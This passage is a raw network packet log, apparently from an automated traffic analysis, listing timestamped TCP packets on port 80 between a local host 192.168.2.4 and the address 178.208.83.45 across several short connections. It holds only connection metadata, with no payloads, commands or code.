                          Nov 12, 2021 22:23:20.897874117 CET8049804178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:20.897900105 CET8049804178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:20.897926092 CET8049804178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:20.897953033 CET8049804178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:20.897980928 CET8049804178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:20.898006916 CET8049804178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:20.898032904 CET8049804178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:20.902765036 CET8049804178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:20.902964115 CET4980480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.703501940 CET4980480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.705066919 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.727484941 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.727585077 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.727682114 CET8049804178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.727737904 CET4980480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.728152990 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.728244066 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.728414059 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.728490114 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.750915051 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.750937939 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.750950098 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.750962019 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.750972986 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.750984907 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.750994921 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.751008034 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.751015902 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.751023054 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.751025915 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.751029968 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.751038074 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.751076937 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.751107931 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.751137972 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.773554087 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773576975 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773588896 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773602009 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773613930 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773622036 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773627043 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.773629904 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773642063 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773650885 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773667097 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.773674011 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773682117 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773684978 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.773691893 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773736000 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.773746014 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773758888 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773772001 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773777962 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.773782969 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773797035 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773801088 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.773808002 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773819923 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.773819923 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.773838997 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.773857117 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.796092033 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796118021 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796130896 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796144009 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796154976 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796166897 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796179056 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796173096 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.796190977 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796241999 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.796263933 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.796271086 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796278000 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:21.796313047 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796325922 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796338081 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796355009 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796366930 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796379089 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796391010 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796403885 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796426058 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796436071 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796438932 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796462059 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796473980 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796487093 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796499014 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796509027 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796520948 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796533108 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796544075 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796556950 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796569109 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796581030 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796611071 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796659946 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796672106 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796683073 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796696901 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796710014 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.796720982 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.818598986 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.818690062 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.818922043 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.818983078 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.819099903 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.819226980 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.822199106 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:21.822274923 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.318795919 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.319895029 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.341229916 CET8049805178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.341865063 CET4980580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.342231989 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.342380047 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.347075939 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.347258091 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.347424030 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.347526073 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.369467020 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.369493961 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.369680882 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.369693041 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.369715929 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.369728088 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.369740009 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.369754076 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.369761944 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.369777918 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.369793892 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.369807005 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.369811058 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.369827032 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.369844913 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.369862080 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.370318890 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.392158985 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392184973 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392199039 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392210960 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392222881 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392234087 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392242908 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392244101 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.392255068 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392268896 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392281055 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392287016 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.392292023 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392303944 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392317057 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392328978 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392340899 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.392340899 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392353058 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392362118 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.392364979 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392381907 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.392395973 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.392406940 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.392615080 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392627954 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.392694950 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.414725065 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.414752960 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.414764881 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.414777994 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.414788961 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.414800882 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.414815903 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.414827108 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.414839029 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.414848089 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.414856911 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.414861917 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.414868116 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.414890051 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.414897919 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.414910078 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.414942026 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.414949894 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.414957047 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.414985895 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.414994955 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415020943 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415034056 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415045977 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415059090 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415071011 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415101051 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415112972 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415142059 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415154934 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415167093 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415184975 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415194988 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415204048 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415256023 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415268898 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415299892 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415311098 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415324926 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415335894 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.415348053 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.437572956 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.437596083 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.437608004 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.437628984 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.437639952 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.437666893 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.437679052 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.437701941 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.437714100 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.437725067 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.437737942 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.437751055 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.437762022 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.437773943 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.439791918 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.439918041 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.876790047 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.877840042 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.899280071 CET8049806178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.900053978 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.900166035 CET4980680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.900213957 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.900768042 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.900939941 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.901187897 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.901346922 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.923074007 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.923099041 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.923425913 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.923439980 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.923453093 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.923495054 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.923528910 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.923561096 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.923573017 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.923619032 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.923630953 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.923643112 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.923655033 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.923666954 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.923677921 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.923681021 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.923705101 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.923746109 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.945979118 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946008921 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946022987 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946034908 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946047068 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946058989 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946070910 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946082115 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946094990 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946100950 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.946108103 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946119070 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946130991 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946146011 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.946177006 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.946199894 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.946225882 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946239948 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946253061 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946264982 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946275949 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.946278095 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946290016 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946301937 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.946331978 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.946352005 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.946365118 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.968476057 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968502045 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968514919 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968525887 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968539953 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968555927 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968569994 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968573093 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.968580961 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968595028 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968619108 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.968640089 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:22.968651056 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968667030 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968677998 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968689919 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968702078 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968714952 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968725920 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968760014 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968770981 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968957901 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.968990088 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.969037056 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.969048977 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.969059944 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.969073057 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.969085932 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.969099045 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.969110012 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.969120979 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.969132900 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.969147921 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.969160080 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.969172001 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.969183922 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.969194889 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.969207048 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.969218969 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.969230890 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.969242096 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.990928888 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.990952969 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.990994930 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.991053104 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.991076946 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.991089106 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.991153955 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.991194963 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.991355896 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.993951082 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:22.994930983 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:23.861995935 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:23.863581896 CET4981080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:23.884409904 CET8049809178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:23.885912895 CET8049810178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:23.886085033 CET4980980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:23.888448000 CET4981080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:23.888482094 CET4981080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:23.888487101 CET4981080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:23.888501883 CET4981080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:23.888523102 CET4981080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:23.910852909 CET8049810178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:23.910887957 CET8049810178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:23.910900116 CET8049810178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:23.910914898 CET8049810178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:23.910927057 CET8049810178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:23.910943031 CET8049810178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:23.910953999 CET8049810178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:23.910969973 CET8049810178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:23.910981894 CET8049810178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:23.910999060 CET8049810178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:23.911010027 CET8049810178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:23.911020994 CET8049810178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:23.911058903 CET4981080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:23.911128998 CET4981080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:23.911154985 CET4981080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:23.933459044 CET8049810178.208.83.45192.168.2.4
